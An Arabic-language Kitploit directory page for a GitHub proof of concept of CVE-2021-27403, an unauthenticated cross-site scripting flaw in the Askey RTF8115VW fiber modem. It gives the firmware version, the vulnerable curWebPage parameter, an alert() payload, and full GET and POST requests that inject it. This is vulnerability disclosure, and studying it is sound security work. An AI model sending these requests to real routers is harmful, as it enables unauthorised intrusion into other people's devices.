Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-27403 — XSS-Askey | Kitploit
أدوات/GitHubGitHub/bokanrb/cve-2021-27403
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتأمن الويباختبار الاختراق
GitHubbokanrb/cve-2021-27403

CVE-2021-27403

XSS-Askey

عرض المستودع
13منذ 5 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

برمجة نصية عبر المواقع غير مصادق عليها - مودم ألياف الإنترنت Askey

البائع: Askey
إصدار البرنامج: BR_SV_g11.11_RTF_TEF001_V6.54_V014
الطراز: RTF8115VW
المعامل القابل للاختراق: curWebPage
الحمولة: ";alert('xss')//
لم يتم اختباره في طراز/إصدار آخر.

عبر طلب GET

root@kitploit:~
في طلب تسجيل الدخول يمكننا إرسال طلب GET:
http://x.x.x.x/cgi-bin/te_acceso_router.cgi?curWebPage=/settings-internet.asp";alert('xss')//&loginUsername=admin&loginPassword=admin

معامل اسم المستخدم وكلمة المرور لا يحتاجان إلى أن يكونا صحيحين.

Alt text

عبر طلب POST

root@kitploit:~
1) قم بإعداد البروكسي الخاص بك (Burp / ZAP / أي أداة) لاعتراض طلب تسجيل الدخول
2) أدخل الحمولة بعد صفحة .asp المستخدمة بواسطة معامل curWebPage
3) قم بإعادة توجيه الطلب

الطلب النهائي

root@kitploit:~
POST /cgi-bin/te_acceso_router.cgi HTTP/1.1
Host: x.x.x.x
Origin: http://x.x.x.x
Cookie: _httpdSessionId_=ece9eb5b733f7cbc8198ce9b6ab995c2
Upgrade-Insecure-Requests: 1
Referer: http://x.x.x.x/login.asp
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Connection: close
Cache-Control: max-age=0
Accept-Encoding: gzip, deflate
Content-Length: 35

curWebPage=%2Fsettings-firewall.asp+payload
 <!---curWebPage=%2Fsettings-firewall.asp";alert('xss')//--->
تنزيل الأداة